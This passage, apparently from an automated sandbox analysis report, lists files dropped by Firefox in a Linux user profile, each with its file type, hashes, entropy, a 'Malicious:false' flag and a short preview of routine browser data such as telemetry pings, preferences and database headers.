                                                                                                                                                                                                    SHA-512:9C580A197186EBBDB1DB70DE2945D93C68F07840BC0A207BCDEF7ECEDAC747F4B524279AD1CFE5EF32D309C0E548583AFCA912EC871F1FBC092415755EB93EBD
                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                                    Preview:{"version":1,"listeners":{"remote-settings/monitor_changes":{"version":"\"1629467836325\"","sourceInfo":{"moduleURI":"resource://services-settings/remote-settings.js","symbolName":"remoteSettingsBroadcastHandler"}}}}

                                                                                                                                                                                                    /home/saturnino/.mozilla/firefox/a3xevaya.default-release/cert9.db

                                                                                                                                                                                                    Download File
                                                                                                                                                                                                    Process:/usr/lib/firefox/firefox
                                                                                                                                                                                                    File Type:SQLite 3.x database, last written using SQLite version 3036000, page size 32768, file counter 9, database pages 7, cookie 0x5, schema 4, UTF-8, version-valid-for 9
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):458752
                                                                                                                                                                                                    Entropy (8bit):0.864841057620201
                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                    SSDEEP:384:Ss1zkVmvQhyn+Zoz67XwJt2dZ60ubZI3C18+PNliMM0dDZ8BX9W1zkVmvQhyn+Zi:SsQwJtZNuMp3YwJtZNuMKq
                                                                                                                                                                                                    MD5:0872BD9CC8CDC40EA36A96258AC50645
                                                                                                                                                                                                    SHA1:EE3E5D4A65CCF27BD8436318C054B545F0734C04
                                                                                                                                                                                                    SHA-256:A87B30D2CAD20468F90051C868F614D5F90CC751402723AB90E3034A63FB462F
                                                                                                                                                                                                    SHA-512:64A3C9C2B0AFEC1479A6937826332199EC6AFC4C0EC0A1DFA3AB9FDD2072AF52322A67F83A46C08B456357E03087B80B5E8DD27AF9D76DEBA87B1368E64957BB
                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                                    Preview:SQLite format 3......@ ..........................................................................S`.....z..{...{.{j{*z.................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                    /home/saturnino/.mozilla/firefox/a3xevaya.default-release/cert9.db-journal

                                                                                                                                                                                                    Download File
                                                                                                                                                                                                    Process:/usr/lib/firefox/firefox
                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):459912
                                                                                                                                                                                                    Entropy (8bit):0.7971845673433273
                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                    SSDEEP:384:slsPdGSZvdZ60ubZI3C18+PNliMM0h41zkVmvQhyn+Zoz67dpXbpZnwJt2dZ60uv:C7NuMaIwJtZNuM/sQ
                                                                                                                                                                                                    MD5:064DAEB4D7180053641678C5E5A74601
                                                                                                                                                                                                    SHA1:A1014570EDE02437AAD75AF9D39B08BC4520D5A7
                                                                                                                                                                                                    SHA-256:E39465A6923C96D48DF17EA3E385A12196E3EDC389524B42A0F1093844116B5C
                                                                                                                                                                                                    SHA-512:83974B24AF10C2028339C98D31F65D4261DF1AA38B705EAE3718D06CC2223D896D77675AE853035616B8C4E1EACB6F383B3432870301EF58EFB52E9EDB6A188F
                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                                    Preview:............x.w...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................R..R.k........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                    /home/saturnino/.mozilla/firefox/a3xevaya.default-release/crashes/store.json.mozlz4.tmp

                                                                                                                                                                                                    Download File
                                                                                                                                                                                                    Process:/usr/lib/firefox/firefox
                                                                                                                                                                                                    File Type:Mozilla lz4 compressed data, originally 56 bytes
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):66
                                                                                                                                                                                                    Entropy (8bit):4.837595020998689
                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                    SSDEEP:3:3fX/xH8IXl/I3v0lb7iioW:vXpH1RPXt
                                                                                                                                                                                                    MD5:A6338865EB252D0EF8FCF11FA9AF3F0D
                                                                                                                                                                                                    SHA1:CECDD4C4DCAE10C2FFC8EB938121B6231DE48CD3
                                                                                                                                                                                                    SHA-256:078648C042B9B08483CE246B7F01371072541A2E90D1BEB0C8009A6118CBD965
                                                                                                                                                                                                    SHA-512:D950227AC83F4E8246D73F9F35C19E88CE65D0CA5F1EF8CCBB02ED6EFC66B1B7E683E2BA0200279D7CA4B49831FD8C3CEB0584265B10ACCFF2611EC1CA8C0C6C
                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                                    Preview:mozLz40.8.....{"v":1,"crashes":{},"countsByDay....rruptDate":null}

                                                                                                                                                                                                    /home/saturnino/.mozilla/firefox/a3xevaya.default-release/datareporting/aborted-session-ping.tmp

                                                                                                                                                                                                    Download File
                                                                                                                                                                                                    Process:/usr/lib/firefox/firefox
                                                                                                                                                                                                    File Type:JSON data
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):37861
                                                                                                                                                                                                    Entropy (8bit):5.246997365530222
                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                    SSDEEP:768:9GP2eqy/N1EBzR1XTvp6xpXX9w0o3UBMUtdmvwjQ4WUV6d6pxVs8:uHl1qdF6XUUBMUtS4WUV6d6dR
                                                                                                                                                                                                    MD5:7FB8D04B72D883D4839535A344F9C69D
                                                                                                                                                                                                    SHA1:E5A85CB3C9C6938DBF43E27BBCE1976D14CA2AE8
                                                                                                                                                                                                    SHA-256:43F66EF79D9E27CB362037D75DE84070CF7ACB2133EB6567E3B33032C3BBA4CF
                                                                                                                                                                                                    SHA-512:296146085AA9CFBB649A71144269F666F00AB4B78133FD02DE014A4C02790CC2CDF9B07C853E4CC1F0C332E94B9769B8DDF505F154594E00D9D13B49BAEF04DC
                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                                    Preview:{"type":"main","id":"6a93ac63-190b-48f6-bcaa-07cdc1ccb282","creationDate":"2024-12-19T14:48:24.785Z","version":4,"application":{"architecture":"x86-64","buildId":"20210816143654","name":"Firefox","version":"91.0.1","displayVersion":"91.0.1","vendor":"Mozilla","platformVersion":"91.0.1","xpcomAbi":"x86_64-gcc3","channel":"release"},"payload":{"ver":4,"simpleMeasurements":{"totalTime":66,"start":150,"main":613,"selectProfile":1574,"afterProfileLocked":3067,"startupCrashDetectionBegin":4245,"startupCrashDetectionEnd":60062,"firstPaint":15564,"firstPaint2":13855,"sessionRestoreInit":6537,"sessionRestored":22488,"createTopLevelWindow":6582,"AMI_startup_begin":4340,"XPI_startup_begin":4348,"XPI_bootstrap_addons_begin":4384,"XPI_bootstrap_addons_end":4414,"XPI_startup_end":4415,"AMI_startup_end":4415,"XPI_finalUIStartup":6537,"sessionRestoreInitialized":6539,"delayedStartupStarted":13886,"delayedStartupFinished":14188,"startupInterrupted":0,"debuggerAttached":0,"activeTicks":0},"processes":{"

                                                                                                                                                                                                    /home/saturnino/.mozilla/firefox/a3xevaya.default-release/datareporting/glean/db/data.safe.bin

                                                                                                                                                                                                    Download File
                                                                                                                                                                                                    Process:/usr/lib/firefox/firefox
                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):22034
                                                                                                                                                                                                    Entropy (8bit):4.1673389473809195
                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                    SSDEEP:192:0FvQVbFFvQVbdFvQVbjFvQVbnFvQVb1FvQVbMFvQVbiFvQVb:JVbwVboVb2VbCVbAVbhVb3Vb
                                                                                                                                                                                                    MD5:8BB325D0B91E26325FEF67E855F398A8
                                                                                                                                                                                                    SHA1:9E959060AA5E152DD2E19064797BCADACA3DC77B
                                                                                                                                                                                                    SHA-256:5B295F71D669AA028F991977490A4C7C076BD8D9262AAC95B6D5F0124C843C69
                                                                                                                                                                                                    SHA-512:3AB953CF3FFCADBBACCD5DBBDF64F188189690B47A1B7EC8C699BBAACE264C94F8B5C29386D7B9323363362A6378291EE8958FCA96C75AD09415E7DAB46E624C
                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                                    Preview:.................app....................glean_client_info#app_build#............................20210816143654........glean_client_info#app_channel.............................release%.......glean_client_info#app_display_version.............................91.0.1........glean_client_info#architecture.............................x86_64%.......glean_client_info#device_manufacturer.............................unknown........glean_client_info#device_model.............................unknown........glean_client_info#os.............................Linux........glean_client_info#os_version.............................5.4.........ping............2.......baseline#glean.validation.pings_submitted/baseline.........................!.......metrics#browser.ui.proton_enabled..............................metrics#fog.initialization..............................0..............metrics#fog.ipc.buffer_sizes=........4...................8..................................lX..?........metrics#fog.ipc.flush_du

                                                                                                                                                                                                    /home/saturnino/.mozilla/firefox/a3xevaya.default-release/datareporting/glean/tmp/4ee394c6-d4cd-43bd-8233-6c819b0e9770

                                                                                                                                                                                                    Download File
                                                                                                                                                                                                    Process:/usr/lib/firefox/firefox
                                                                                                                                                                                                    File Type:ASCII text, with very long lines (447)
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):527
                                                                                                                                                                                                    Entropy (8bit):5.026634247085972
                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                    SSDEEP:12:BG2asuzDMieiuiAU7MATdNBHNFHU7+4484hVpqsGemH1kD4V:BGzsGAieikUQstF0y448opEeA1kD4V
                                                                                                                                                                                                    MD5:A81671698C1FDEF673D34FCDED8AEF64
                                                                                                                                                                                                    SHA1:0994A58F0F08B159B23DF9C72B0C9778896DA911
                                                                                                                                                                                                    SHA-256:B31CF7ECB7C4CC94FAC670AADC2D157C599BFD0A3DD035C92208C569BF3B6DDB
                                                                                                                                                                                                    SHA-512:D9C97E5E2E7D9E690FFC702D9B32E9B31018F825F16C7883325188BD0A62B4895BD5A08CBFC71B49E361817A37727F0E6CF59CA8ED52279783459D2F706EA09E
                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                                    Preview:/submit/firefox-desktop/deletion-request/1/4ee394c6-d4cd-43bd-8233-6c819b0e9770.{"ping_info":{"seq":0,"start_time":"2024-12-19T08:47-06:00","end_time":"2024-12-19T08:47-06:00","reason":"at_init"},"client_info":{"telemetry_sdk_build":"39.0.0","client_id":"f80109fa-2a5b-4fd2-a42f-76603a7fb825","first_run_date":"2021-08-17+00:00","app_build":"20210816143654","device_model":"unknown","os_version":"5.4","app_channel":"release","app_display_version":"91.0.1","os":"Linux","architecture":"x86_64","device_manufacturer":"unknown"}}

                                                                                                                                                                                                    /home/saturnino/.mozilla/firefox/a3xevaya.default-release/datareporting/session-state.json.tmp

                                                                                                                                                                                                    Download File
                                                                                                                                                                                                    Process:/usr/lib/firefox/firefox
                                                                                                                                                                                                    File Type:JSON data
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):162
                                                                                                                                                                                                    Entropy (8bit):4.93184816848522
                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                    SSDEEP:3:YWAqKs/ZVWIHefAwBUTcJWQHxMfmQI6pdGgvigzJA2aqnLPJUoa/H5C:YWAqf/+I+fAwiQJWSKfBVpdZqYOanLc4
                                                                                                                                                                                                    MD5:DB8DC8FAFB7A0A2700168A4FD379D69A
                                                                                                                                                                                                    SHA1:AE2BA5A14A927EDCB7E9D1F1DEF71A0035000C44
                                                                                                                                                                                                    SHA-256:E64C15AE3BAE86EC9D0C9231CABDE362FA330D8B30913D91409A2EBEFB2E6BFE
                                                                                                                                                                                                    SHA-512:4F63E687A182362EA358FAAFFA8631D5E732EC6C4537ABBFF445E096A156170988CB58258AE0C33E059B440D0ED08302BF191618327FE6125A95653AC58C2E09
                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                                    Preview:{"sessionId":"b0b902b1-5776-435f-b67c-2e6243d16922","subsessionId":"8daa54cb-93aa-488a-8ca6-963f7eb53739","profileSubsessionCounter":10,"newProfilePingSent":true}

                                                                                                                                                                                                    /home/saturnino/.mozilla/firefox/a3xevaya.default-release/datareporting/state.json.tmp

                                                                                                                                                                                                    Download File
                                                                                                                                                                                                    Process:/usr/lib/firefox/firefox
                                                                                                                                                                                                    File Type:JSON data
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):51
                                                                                                                                                                                                    Entropy (8bit):3.2717530240771033
                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                    SSDEEP:3:YGJBQvAcgVgcVIDwf:YG8PgfiDE
                                                                                                                                                                                                    MD5:3E32E2CC1ED028DD8FF9B06F50A4707B
                                                                                                                                                                                                    SHA1:B3910351BD8E13AD1479DB699CF6FAC6544A5BEF
                                                                                                                                                                                                    SHA-256:4A3A666D98E61B5FE06FECAC56807137A0FFFB4BB71D4C3B16BAA8702DDE738C
                                                                                                                                                                                                    SHA-512:4585EE9EC04ADF138727CD039A9CBE78DB6CF2926F6CE92524312A42EFD1250100848A919EC4B833F9A013181CE93734575B86EED37F1BF32EFFA3237EBA84DB
                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                                    Preview:{"clientID":"c0ffeec0-ffee-c0ff-eec0-ffeec0ffeec0"}

                                                                                                                                                                                                    /home/saturnino/.mozilla/firefox/a3xevaya.default-release/extensions.json.tmp

                                                                                                                                                                                                    Download File
                                                                                                                                                                                                    Process:/usr/lib/firefox/firefox
                                                                                                                                                                                                    File Type:JSON data
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):48713
                                                                                                                                                                                                    Entropy (8bit):5.174045011351523
                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                    SSDEEP:768:9On4M4wfVXy4nWXOxJO9/pN4sG4G4J4k4wh5hvM4r4y4l4G4O4gC6v4j:6ORpphfvG4co
                                                                                                                                                                                                    MD5:CAAE9DFD85622A51E40BC81E527E6A7D
                                                                                                                                                                                                    SHA1:8E1559A6C7E831446C791D827E4788EEF3FCFD59
                                                                                                                                                                                                    SHA-256:836339FA04A74196FAB90D3128B1C4AFEB52876322A0DB38001BD87AAD660488
                                                                                                                                                                                                    SHA-512:69053EBEBB03D84AF4FA8B1656B99F543F33414B039FEA55CB0F93BAA23AA169527DE10F9A45F6724A708BA8F638F4E4486D614FEC43EF85031C7572A95C9EE6
                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                                    Preview:{"schemaVersion":33,"addons":[{"id":"doh-rollout@mozilla.org","syncGUID":"{0b694065-4b8a-4b9f-bc88-9f12b8b5cf70}","version":"2.0.0","type":"extension","loader":null,"updateURL":null,"optionsURL":null,"optionsType":null,"optionsBrowserStyle":true,"aboutURL":null,"defaultLocale":{"name":"DoH Roll-Out","description":"This used to be a Mozilla add-on that supported the roll-out of DoH, but now only exists as a stub to enable migrations.","creator":null,"developers":null,"translators":null,"contributors":null},"visible":true,"active":true,"userDisabled":false,"appDisabled":false,"embedderDisabled":false,"installDate":1628151708000,"updateDate":1629147618000,"applyBackgroundUpdates":1,"path":"/usr/lib/firefox/browser/features/doh-rollout@mozilla.org.xpi","skinnable":false,"sourceURI":null,"releaseNotesURI":null,"softDisabled":false,"foreignInstall":false,"strictCompatibility":true,"locales":[],"targetApplications":[{"id":"toolkit@mozilla.org","minVersion":"72.0a1","maxVersion":null}],"target

                                                                                                                                                                                                    /home/saturnino/.mozilla/firefox/a3xevaya.default-release/key4.db

                                                                                                                                                                                                    Download File
                                                                                                                                                                                                    Process:/usr/lib/firefox/firefox
                                                                                                                                                                                                    File Type:SQLite 3.x database, last written using SQLite version 3036000, page size 32768, file counter 3, database pages 9, cookie 0x6, schema 4, UTF-8, version-valid-for 3
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):98304
                                                                                                                                                                                                    Entropy (8bit):0.4045282931524637
                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                    SSDEEP:192:mva0zkVmvQhyn+Zoz679fqlQbGhMHPaVAL23vLfzw:m1zkVmvQhyn+Zoz67azw
                                                                                                                                                                                                    MD5:6C9A6392BE7888BAD0637E8A4F42DB5D
                                                                                                                                                                                                    SHA1:F31283463B7089111E746DB48F5220EEB7AD7F96
                                                                                                                                                                                                    SHA-256:4A1BD3B9B4B77E2479C2CEA89733A0F562A729E998B1CB22A384793C539069C8
                                                                                                                                                                                                    SHA-512:9A77F1942FC56E0C9D7F3540DAF74294A99162084157508AFB11C62DC016166043998385E4F16B47717939DE39FDD715EDD5B561279B56CDE034C249BADD8929
                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                                    Preview:SQLite format 3......@ ..........................................................................S`.....z<.{...{.{a{.z.z<z.............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                    /home/saturnino/.mozilla/firefox/a3xevaya.default-release/key4.db-journal

                                                                                                                                                                                                    Download File
                                                                                                                                                                                                    Process:/usr/lib/firefox/firefox
                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):98852
                                                                                                                                                                                                    Entropy (8bit):0.22716522595394834
                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                    SSDEEP:192:lzVva0zkVmvQhyn+Zoz679fqlQbGhMHPaVAL23vO:pV1zkVmvQhyn+Zoz67H
                                                                                                                                                                                                    MD5:29E5CD1EA1B93C2417B86241533005B8
                                                                                                                                                                                                    SHA1:181930A13DF97B09CC981F8389E2C3491C3D6C14
                                                                                                                                                                                                    SHA-256:239DA1748B520FBE731634E2EF48893A3A7BF41ED87A8097C144BA441CB37176
                                                                                                                                                                                                    SHA-512:DAFCF5C151865CDABB38811C2EB4A5B4801FD3CB9DCE822A4EBF506F62F070C5CF9D1F39C183B943DB9E7543EDC16291345CA22BA34C8F8041A1340B6F069BD1
                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                                    Preview:.............d........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                    /home/saturnino/.mozilla/firefox/a3xevaya.default-release/prefs-1.js

                                                                                                                                                                                                    Download File
                                                                                                                                                                                                    Process:/usr/lib/firefox/firefox
                                                                                                                                                                                                    File Type:ASCII text, with very long lines (1127)
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):109769
                                                                                                                                                                                                    Entropy (8bit):5.218687962081494
                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                    SSDEEP:768:MoyhNJoyhNboyhVboyhjmoyhjGoyhjGoyQjGoyQIGoyQA/:5yKyoyYyZytytyAyHyX
                                                                                                                                                                                                    MD5:7285A5F60F758C576BA9CB370976F5EE
                                                                                                                                                                                                    SHA1:B2DC13BD3C1138A515B360B5311EB17835D2D67E
                                                                                                                                                                                                    SHA-256:CB4C2B90DDD23BB971AD5EFB50AD65DD1500C26676E58A0F70506DFBE81E001C
                                                                                                                                                                                                    SHA-512:048EB77FDB0D21FF6AC19FB17BCFC7B18A5562AE0B6FE3FE29FA18770AA0B4F4DFD9FA64868D8290D623F947F97D7D5DC6A6D2898D981A29EDD9D233EEE3368B
                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                                    Preview:// Mozilla User Preferences..// DO NOT EDIT THIS FILE..//.// If you make changes to this file while the application is running,.// the changes will be overwritten when the application exits..//.// To change a preference value, you can either:.// - modify it via the UI (e.g. via about:config in the browser); or.// - set it within a user.js file in your profile...user_pref("app.normandy.first_run", false);.user_pref("app.normandy.migrationsApplied", 12);.user_pref("app.normandy.startupRolloutPrefs.media.peerconnection.mtransport_process", true);.user_pref("app.normandy.startupRolloutPrefs.network.process.enabled", true);.user_pref("app.normandy.user_id", "e34bc139-ede7-4eef-acd2-d2d8ffa0c304");.user_pref("app.update.lastUpdateTime.addon-background-update-timer", 1629470032);.user_pref("app.update.lastUpdateTime.browser-cleanup-thumbnails", 1629466019);.user_pref("app.update.lastUpdateTime.recipe-client-addon-run", 1629467970);.user_pref("app.update.lastUpdateTime.region-update-timer", 0)

                                                                                                                                                                                                    /home/saturnino/.mozilla/firefox/a3xevaya.default-release/search.json.mozlz4

                                                                                                                                                                                                    Download File
                                                                                                                                                                                                    Process:/usr/lib/firefox/firefox
                                                                                                                                                                                                    File Type:Mozilla lz4 compressed data, originally 467 bytes
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):196
                                                                                                                                                                                                    Entropy (8bit):5.4478819013219715
                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                    SSDEEP:6:vXvz2SNtSapaBlP7521T06xz3Jg75I2k7TEv2X8W6:vvz2SNtjpOPWgsz3JYk7vq
                                                                                                                                                                                                    MD5:DE18406D63DF1F173806E777DABDADFB
                                                                                                                                                                                                    SHA1:076F314F75C8555C0220BB0EF7129750D9B1B9C8
                                                                                                                                                                                                    SHA-256:89F9037A361F2A097E61121697426233D8D8AF5B6E18E92D6612E8D65D0A562C
                                                                                                                                                                                                    SHA-512:0E94A9D0D5DAC99BC07C1C9C191EDE376041D8C43D3B9DAC99A47ABE451C518B8F65EF6513A0956B9FC72AF96A05A7A81040257C40A26215F91841C7488C93B2
                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                                    Preview:mozLz40......A{"version":6,"engines":[{"_name":"Google","_isAppProvided":true,"_metaData":{}},8..Wikipedia (en)@..OBing6...Amazon.d.. @Duck../Gow..OeBay6.....?com<..7],"o..."useSavedOrder":false}}

                                                                                                                                                                                                    /home/saturnino/.mozilla/firefox/a3xevaya.default-release/sessionCheckpoints.json.tmp

                                                                                                                                                                                                    Download File
                                                                                                                                                                                                    Process:/usr/lib/firefox/firefox
                                                                                                                                                                                                    File Type:JSON data
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):143
                                                                                                                                                                                                    Entropy (8bit):4.223691028533093
                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                    SSDEEP:3:YVXKQJAyiVLQwJtJDBA+ABaQJAyiVLQwJtJDBA+AJ2LKZXJ3YFwHY:Y9KQOy6Lb1BA+kOy6Lb1BA+m2L69Yr
                                                                                                                                                                                                    MD5:C0E4C22C50DD21142F57714EF49B8713
                                                                                                                                                                                                    SHA1:06B77307DCA5C889EA279243E74730CBC10801BE
                                                                                                                                                                                                    SHA-256:6FE46B65B76B3DF32D8392853740B35ED75B6E23F4FBD6F45F3EFA1D496E6717
                                                                                                                                                                                                    SHA-512:A4516B4F15EDB429F7B8CE3EA709D3777BFCC590838B1E113147E6BFB4DF0F34F0F2B24F6185D4E4277A77F75711BB470461B86AA507921AF037A6D22DF9278E
                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                                    Preview:{"profile-after-change":true,"final-ui-startup":true}{"profile-after-change":true,"final-ui-startup":true,"sessionstore-windows-restored":true}

                                                                                                                                                                                                    /home/saturnino/.mozilla/firefox/a3xevaya.default-release/sessionstore-backups/recovery.jsonlz4.tmp

                                                                                                                                                                                                    Download File
                                                                                                                                                                                                    Process:/usr/lib/firefox/firefox
                                                                                                                                                                                                    File Type:Mozilla lz4 compressed data, originally 3230 bytes
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):5130
                                                                                                                                                                                                    Entropy (8bit):6.257296638645694
                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                    SSDEEP:48:iZtHtpVDft16lhh7y4+ZHtpVDft16lhh7y4+ZYtpVDft16lhh7y4+ZTtpVDft16X:0jVTz6tYVTz6tbVTz6tuVTz6tB
                                                                                                                                                                                                    MD5:75C1A62D0BA51FE49AFAEE9F83A4194F
                                                                                                                                                                                                    SHA1:0DC446668CA4CC84CBD2B06DC60C3769A3F7DF5E
                                                                                                                                                                                                    SHA-256:57F36D559D0414257C746FFC553FBEEDB39CC165E619956ACA898CEF812CCAA9
                                                                                                                                                                                                    SHA-512:6041D993D1B5FBB45FB95C326D8E13067B2E4A7D22C19BB3DDC8B4E0A9C9FD6FA541A4E878D13576B613D4D50B2B7B79E9EC641EBABD98F095BA2C97CB5963F1
                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                                    Preview:mozLz40.......{"version":["ses....restore",1],"windows":[],"selectedW...":0,"_clos...'..H...":{"lastUpdate":1734619670106,"startTim....45400,"recentCrashes":0},"global":{},"cooki......a..S..!Stg.....P{"tab..b{"entrU.. {"url":"about:home","title":"New Tab","cacheKey....ID":1,"docshellUU...."{387a7475-8923-4191-a685-829ff165a620}"....sultPrincipalURI":null,"p...sToInherit_base64":"eyIwIjp7IjAiOiJtb3otbnVsbHByaW5jaXBhbDp7ODQ1ZTllNTUtYzUwMi00Zjk2LThhMzAtOWNmMjRhZGMxYjNlfSJ9fQ==","partitionedP..k..hasUserInteract....false,"triggeringB..%..z%.0fX0....docIdentifier":2147483649,"persist":true}[...Accessed":1629470047042,"hidde...searchMode...userContextId%..attribut.....Qindex8..requestedI....0,"image":"chrome://branding/cU..nt/icon32.png"......Q.....T.......dth":921,"height":666,"screenX":4...Y..Aizem..."maximized"...BeforeMin...&..workspace..S0","z...1K..._shouldRx....","Y.*At{..3...U..........................:269.....P39107......@{"hoG..."addons.mozilla.org","valu...A2da17c6a8cc11f2fc083590

                                                                                                                                                                                                    /home/saturnino/.mozilla/firefox/a3xevaya.default-release/storage/permanent/chrome/idb/3870112724rsegmnoittet-es.sqlite

                                                                                                                                                                                                    Download File
                                                                                                                                                                                                    Process:/usr/lib/firefox/firefox
                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):28672
                                                                                                                                                                                                    Entropy (8bit):6.117080021933792
                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                    SSDEEP:768:K3sCJm3z3a3M3jWHjF2NNrnsrx4Nab6MSBHhap6Ul22y1HaqeHhcHm91Hp:K3o3z3a3M3Ojf1kBHhap6Ul2n1HaqeH3
                                                                                                                                                                                                    MD5:2672D6B57621B74D060C6FC399DFCADD
                                                                                                                                                                                                    SHA1:7500A1E08D82966806E231D3DA34B211151B5457
                                                                                                                                                                                                    SHA-256:DA329DDB72B5E05874BA4E78B0D524F19BC200A0A539F6CDB273BDFAD304A65D
                                                                                                                                                                                                    SHA-512:643877BCEB2B0A74AF8B559B6060D30121FBC82B7AFBAF29BD62EC0985E3069F3434A1D6C0C29028188D98037DCABB1ADE1ABBBBDBAA895849D5DF620CD53151
                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                                    Preview:.... ......l...e...........n.........S.v.....`...n.l...*.........,.D...j...F...~.......>.....N..............................................................................R..2~..0nbjo0tfbsdi.dpogjh.nbjo0tfbsdi.dpogjh.0f:9d774e.519e.5:12.:777.77f78b4195c5\..D~....nbjo0tfbsdi.dpogjh...w .....nbjo0tfbsdi.dpogjh.0d61edd98.12:3.5572.cc99.28b66cb292d8R..2~..0nbjo0tfbsdi.dpogjh.nbjo0tfbsdi.dpogjh.0d61edd98.12:3.5572.cc99.28b66cb292d8\..D~....nbjo0tfbsdi.dpogjh...w .....nbjo0tfbsdi.dpogjh.0g6:geecd.691c.5783.:deb.43:52dffd83:R..2~..0nbjo0tfbsdi.dpogjh.nbjo0tfbsdi.dpogjh.0g6:geecd.691c.5783.:deb.43:52dffd83:\..D~....nbjo0tfbsdi.dpogjh...w .....nbjo0tfbsdi.dpogjh.0f1db5:75.f435.55f8.91c7.27b942817e28R..2~..0nbjo0tfbsdi.dpogjh.nbjo0tfbsdi.dpogjh.0f1db5:75.f435.55f8.91c7.27b94...._..F......nbjo0qbttxpse.svmft...w..s2.nbjo0qbttxpse.svmft.0cg9f6958.c121.534f.:679.f2ed88g9g319...._..F......nbjo0qbttxpse.svmft...w..s*`.nbjo0qbttxpse.svmft.0113b2f6e.5dg7.5:65.96b:.6e1f8d1edbge...8U..4....0nbjo0qbttxp

                                                                                                                                                                                                    /home/saturnino/.mozilla/firefox/a3xevaya.default-release/storage/permanent/chrome/idb/3870112724rsegmnoittet-es.sqlite-wal

                                                                                                                                                                                                    Download File
                                                                                                                                                                                                    Process:/usr/lib/firefox/firefox
                                                                                                                                                                                                    File Type:SQLite Write-Ahead Log, version 3007000
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):41232
                                                                                                                                                                                                    Entropy (8bit):6.161464205039535
                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                    SSDEEP:768:F3sCJ53z3a3M3jWeq68TNNrnsrx4Nab6MQBHhap6Ul2R6jads1HDjeHhcHm91HyC:F3H3z3a3M3Dq+1GBHhap6Ul2R6jae1HS
                                                                                                                                                                                                    MD5:633E677B1B64DD0F456250C316D822F8
                                                                                                                                                                                                    SHA1:518496C29EB23D111EAE8F9C837A36AB3BD20ECC
                                                                                                                                                                                                    SHA-256:82D347DD47B6635BBB17A93BB6A2EB374B0F40A2846D54F8721ED2641878EFC1
                                                                                                                                                                                                    SHA-512:8738C7EC7869420709872FE29E444A76729DF3C721B43ACC902881426B2679739DE79F8025015324AF1A237F1D4BBBDBF3D58B1ECC6E28AD85779BEAD1E7D1D3
                                                                                                                                                                                                    Malicious:false
